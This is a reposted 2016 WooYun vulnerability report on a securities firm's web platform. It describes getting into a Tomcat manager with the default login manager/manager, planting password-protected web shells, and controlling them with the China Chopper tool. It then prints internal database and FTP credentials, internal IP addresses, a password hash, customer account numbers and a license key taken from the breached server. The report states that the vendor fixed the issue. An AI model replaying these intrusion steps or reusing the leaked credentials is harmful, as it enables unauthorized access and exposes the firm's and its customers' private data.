光大证券某平台存在漏洞(已Getshell/可泄漏大量的内部数据) admin 140703文章 117评论 2017年5月2日02:36:01评论371 views字数 233阅读0分46秒阅读模式 摘要2016-06-13: 细节已通知厂商并且等待厂商处理中 2016-06-19: 厂商已经确认,细节仅向厂商公开 2016-06-19: 厂商已经修复漏洞并主动公开,细节向公众公开 漏洞概要 关注数(5) 关注此漏洞 缺陷编号: WooYun-2016-218958 漏洞标题: 光大证券某平台存在漏洞(已Getshell/可泄漏大量的内部数据) 相关厂商: 光大证券 漏洞作者: 路人甲 提交时间: 2016-06-13 21:44 修复时间: 2016-06-19 09:28 公开时间: 2016-06-19 09:28 漏洞类型: 后台弱口令 危害等级: 高 自评Rank: 20 漏洞状态: 厂商已经修复 漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系 Tags标签: 无 0人收藏 漏洞详情 披露状态: 2016-06-13: 细节已通知厂商并且等待厂商处理中 2016-06-19: 厂商已经确认,细节仅向厂商公开 2016-06-19: 厂商已经修复漏洞并主动公开,细节向公众公开 简要描述: 已被Getshell 详细说明: code 区域 漏洞地址: http://218.17.205.91:7003/page/frame/login.jsp 存在tomcat弱口令漏洞 http://218.17.205.91:7003/manager/html 密码为:manager/manager 已Getshell http://218.17.205.91:7003/is/index.jsp 密码:futuresec code 区域 jsp的被删掉了还是没有成功?发现是可以列目录的 http://218.17.205.91:7003/is 幸好工具上传还有jspx的存在 http://218.17.205.91:7003/is/index.jspx 密码:futuresec 用菜刀连接 然后利用菜刀上传一个大马 http://218.17.205.91:7003/is/test.jsp?o=vLogin 还是jsp的被杀了!~~~ 只好用菜刀看看文件了!~~~ 给出一些看到翻到的一些敏感数据 code 区域 C:/GZHK_SENDSMS/webapps/autoSendSms/WEB-INF/classes/db.properties jdbc.driverClassName=net.sourceforge.jtds.jdbc.Driver jdbc.url=jdbc/:jtds/:sqlserver/://10.1.5.24/:1433;instanceName/=10.1.5.24//GZGJ;databaseName/=kdcc30data jdbc.username=sa jdbc.password=sa head.ip=10.1.5.24 head.mac=000C29B14A86 head.operatorName=zsbcws head.operatorPwd=E10ADC3949BA59ABBE56E057F20F883E head.fundId=245 C:/gzgj/KDGUIEngine-jmail/JJ_Config.ini [数据库连接参数] DBtype=0 Hostname = 10.1.5.24 dbname = kdcc30data User =sa Passwd =sa C:/gzgj/kccs/WEB-INF/config/ftp.properties ftp.ip=192.168.202.40 ftp.port=21 ftp.username = gzgjcz ftp.password = gzgj123 ftp.dir= / C:/gzgj/项目过程文件/接口测试/InterFaceTest_国君.ini [连接参数] ;外围版本0是CC20,1是CC30 外围版本 =1 IPAddress = 192.168.50.35 IPPort = 21000 Protocol = TCP 员工编号 = 1 员工密码 = 888888 操作站点 = 127.0.0.1 模块编号 = 10 菜单编号 = 10 参数个数 = 40 [业务处理] 修改密码 = 20104900;khbslx:K,khbs:005144,jymm:111111,xjymm:111111,wldz: 验证客户 = 20102905;khbslx:K,khbs:005144,jymm:111111,mode:,wldz: 查询客户资金 = 20102906;khbslx:CUST,khbs:012540 资金股份查询 = 20102907;khbslx:CUST,khbs:012540,zqbslx:,zqbs:,gdms:,cxlx: 当日委托查询 = 20102913;khbslx:K,khbs:012540,zqbslx:,zqbs:,htxh:,gdms:1,cdms:1 当日成交查询 = 20102914;khbslx:K,khbs:012540,zqbslx:,zqbs:,htxh:4315265,gdms: 银证转帐查询 = 20102917;khbslx:K,khbs:005144,htxh:,cxms: 转帐银行查询 = 20107909;zjzh:005144 根据客户帐户查询客户资料 = 13330006;ywxtbh:,zhlxbh:,khzh: 新股配号查询 = 20102924;khbslx:K,khbs:018324,gdms:2,zqbslx:,zqbs:,qsrq:2001-01-01,zzrq:2008-09-01,cxts:0 历史委托查询 = 20102921;khbslx:K,khbs:012540,gdms:2,zqbslx:,zqbs:,htxh:1,qsrq:2008-01-01,zzrq:2008-09-01,cxts:0 历史成交查询 = 20102922;khbslx:K,khbs:012540,gdms:2,zqbslx:,zqbs:,htxh:1,qsrq:2008-01-01,zzrq:2008-09-01,cxts:0 客户注销 = 20102908;khbslx:K,khbs:005144,gdms:,jysdm: 问卷模板 = 28104201;p_gybh:1,p_gnbh:28104201,p_czzd:1,p_kzcs:,p_gymm:AEIFCAJEOIACHCGCCGLI,wjbh:- 1,wjmc:,sfmb:1,dwbh:-1,qsjzrq:19900101,zzjzrq:20201231,wjzt:,wjlx:-1,sfxypf:,zxwts:-1,zdwts:-1,zxwjzf:-1,zdwjzf:- 1,ksrq:19900101,jsrq:20201231,sfgl:-1 28004002 = 28004002;oper_type:1,lsh:1696,desip:127.0.0.1,file_name:filename 28004003 = 28004003;oper_type:1,lsh:1696,file_name:filename 14290040 = 14290040;p_gybh:1,p_gnbh:14290040,p_czzd:,p_kzcs:,p_gymm:,bzbh:-1,fzzt:-1 40418510 = 40418510;p_gybh:1,p_gnbh:40418510,p_czzd:127.0.0.1,bh:8,p_gymm:AEIFCAJEOIACHCGCCGLI,p_kzcs:,istmp:1,lsh:101,tsl x:1, field_int01:1,field_int02:1,field_int03:1,field_int04:1,field_int05:1,field_int06:1,field_int07:1,field_int08:1,field_int09:1,field_i nt10:1, field_str01:,field_str02:,field_str03:,field_str04:,field_str05:,field_str06:,field_str07:,field_str08:,field_str09:,field_str10:,field_s tr11:, field_str12:,field_str13:,field_str14:,field_str15:,field_str16:,field_str17:,field_str18:,field_str19:,field_str20: 14250010 = 14250010;qsrq:20100910,tjlx:3,p_czzd:127.0.0.1,zzrq:20100910,PageCount:25,p_kzcs:,isPerPage:true,hjlx:- 1,fwpjs:,PageOffset:0,p_gybh:1,p_gnbh:14250010,ygbhlx:1,dfhm:,mtlx:-1,p_gymm:AEIFCAJEOIACHCGCCGLI,khbh:- 1,ygbhs:,thlxs: 40418401 = 40418401;p_gybh:1,p_gnbh:40418401,p_czzd:127.0.0.1,bh:8,p_gymm:AEIFCAJEOIACHCGCCGLI,p_kzcs: 19100002 = 19100002;glgzmc:规则4,sjlySQL:select 1 from temp_test,kzbs:d,bz:d,p_kzcs:,p_gybh:1,p_gnbh:19100002,p_czzd:127.0.0.1,p_gymm:AEIFCAJEOIACHCGCCGLI 13990006 = 13990006;zzkhrq:30001231,khzzh:13,lxdz:,p_fyqs:1,khzt:,sr1:,p_gybh:1,csrq1:,khxm:4,khbh:- 1,csrq2:,p_sfbz:0,jgid:,p_fyhs:10,zjlx:- 1,khlx:,khjl:,p_czzd:127.0.0.1,sr2:,zjhm:,qskhrq:19491001,lxhm:,bz:,p_kzcs:,p_pxzd:,p_gnbh:13990006,sfkzqx:1,khjb2:,yzbm :,szdq:,khxb:,szsf:,khjb1:,p_gymm:AEIFCAJEOIACHCGCCGLI 查询通话类型 = 14020001;lxbh:,zt:,sfbkzs: 待回复信息内容查询(回复后台用) = 19500003;lxfsbs: ZJCQPZ =/u6211 OTHER = /u6211 ftp.download.dir = ftpdownload C:/gzgj/kccs/UPLOAD/UserFiles/Image/sn.txt UserName tfzq PlatForm all Ora-VERSION 10.0.2.0 Modules 87 Days 180 NHOSTS 0 ISSUE_DATE 2012/04/20 LICENSE_KEY 2f276bda3e6a54ef01cd5947624a185fb7c8a083956396eccd127a1ebeee5037 漏洞证明: 修复方案: 你们懂的 版权声明:转载请注明来源 路人甲@乌云 漏洞回应 厂商回应: 危害等级:中 漏洞Rank:10 确认时间:2016-06-19 09:27 厂商回复: 此系统为光证国际,已转发他们,谢谢 最新状态: 2016-06-19:已修复 漏洞评价: 对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值 漏洞评价(共0人评价): 登陆后才能进行评分 评价 免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。 点赞 http://cn-sec.com/archives/770.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫
评论